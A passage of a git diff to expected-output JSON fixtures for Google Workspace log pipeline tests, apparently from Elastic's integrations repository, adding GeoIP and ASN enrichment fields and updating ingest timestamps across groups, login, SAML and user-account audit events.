@@ -1591,8 +1819,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286130900Z", + "ingested": "2021-12-14T14:45:12.889099668Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"revoke_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "revoke_invitation", @@ -1620,24 +1869,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -1672,8 +1912,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286136200Z", + "ingested": "2021-12-14T14:45:12.889100053Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"invite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "invite_user", @@ -1701,24 +1962,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -1753,8 +2005,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286141400Z", + "ingested": "2021-12-14T14:45:12.889100471Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reject_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "reject_join_request", @@ -1782,24 +2055,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -1834,8 +2098,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286168800Z", + "ingested": "2021-12-14T14:45:12.889100988Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reinvite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "reinvite_user", @@ -1863,24 +2148,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -1915,8 +2191,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286173Z", + "ingested": "2021-12-14T14:45:12.889101378Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "remove_user", @@ -1944,6 +2241,9 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" diff --git a/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json b/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json index 1260efd85eb..5878a394ea4 100644 --- a/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json +++ b/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json @@ -33,6 +33,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -42,7 +54,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340887200Z", + "ingested": "2021-12-14T14:45:17.586936822Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_password_leak\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_password_leak", @@ -102,6 +114,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -111,7 +135,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340892600Z", + "ingested": "2021-12-14T14:45:17.586939612Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", @@ -171,6 +195,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -180,7 +216,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340898900Z", + "ingested": "2021-12-14T14:45:17.586940081Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", @@ -240,6 +276,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -249,7 +297,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340903900Z", + "ingested": "2021-12-14T14:45:17.586940494Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", 
@@ -308,6 +356,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -317,7 +377,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340907800Z", + "ingested": "2021-12-14T14:45:17.586940904Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_generic\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_generic", @@ -376,6 +436,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -385,7 +457,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340912700Z", + "ingested": "2021-12-14T14:45:17.586941285Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming_through_relay\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_spamming_through_relay", 
@@ -444,6 +516,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -453,7 +537,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340919200Z", + "ingested": "2021-12-14T14:45:17.586941669Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_spamming", @@ -513,6 +597,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -522,7 +618,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340925400Z", + "ingested": "2021-12-14T14:45:17.586942056Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", 
@@ -578,6 +674,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -587,7 +695,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340931600Z", + "ingested": "2021-12-14T14:45:17.586942447Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"gov_attack_warning\"}}", "provider": "login", "action": "gov_attack_warning", @@ -642,6 +750,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -651,7 +771,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340937700Z", + "ingested": "2021-12-14T14:45:17.586942851Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_failure_type\",\"value\":\"login_failure_access_code_disallowed\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_failure", 
@@ -708,6 +828,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -717,7 +849,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340943800Z", + "ingested": "2021-12-14T14:45:17.586943240Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_challenge\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_challenge", @@ -773,6 +905,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -782,7 +926,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340950400Z", + "ingested": "2021-12-14T14:45:17.586943818Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_verification\",\"parameters\":[{\"name\":\"is_second_factor\",\"boolValue\":false},{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_verification", @@ -836,6 +980,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -845,7 +1001,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340956600Z", + "ingested": "2021-12-14T14:45:17.586944236Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"logout\",\"parameters\":[{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "logout", @@ -900,6 +1056,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -909,7 +1077,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:16.340962800Z", + "ingested": "2021-12-14T14:45:17.586944647Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"is_suspicious\",\"boolValue\":false},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_success", diff --git a/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json b/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json index ded2713b385..3c6f4be9ccb 100644 --- a/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json +++ b/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json @@ -37,6 +37,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -46,7 +58,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.166836800Z", + "ingested": "2021-12-14T14:45:19.798450068Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "provider": "saml", "action": "login_failure", @@ -104,6 +116,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -113,7 +137,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.166844900Z", + "ingested": "2021-12-14T14:45:19.798452567Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "provider": "saml", "action": "login_success", 
diff --git a/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json b/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json index abfbeea015e..a8a3181249c 100644 --- a/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json +++ b/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json @@ -29,6 +29,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -38,7 +50,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537558Z", + "ingested": "2021-12-14T14:45:20.193639239Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_disable\"}}", "provider": "user_accounts", "action": "2sv_disable", @@ -89,6 +101,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -98,7 +122,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537562500Z", + "ingested": "2021-12-14T14:45:20.193641518Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_enroll\"}}", "provider": "user_accounts", "action": "2sv_enroll", @@ -149,6 +173,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -158,7 +194,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537568300Z", + "ingested": "2021-12-14T14:45:20.193641978Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"password_change\",\"name\":\"password_edit\"}}", "provider": "user_accounts", "action": "password_edit", @@ -209,6 +245,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -218,7 +266,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537572800Z", + "ingested": "2021-12-14T14:45:20.193642381Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_email_edit\"}}", "provider": "user_accounts", "action": "recovery_email_edit", @@ -269,6 +317,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -278,7 +338,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537577900Z", + "ingested": "2021-12-14T14:45:20.193642787Z", "original": 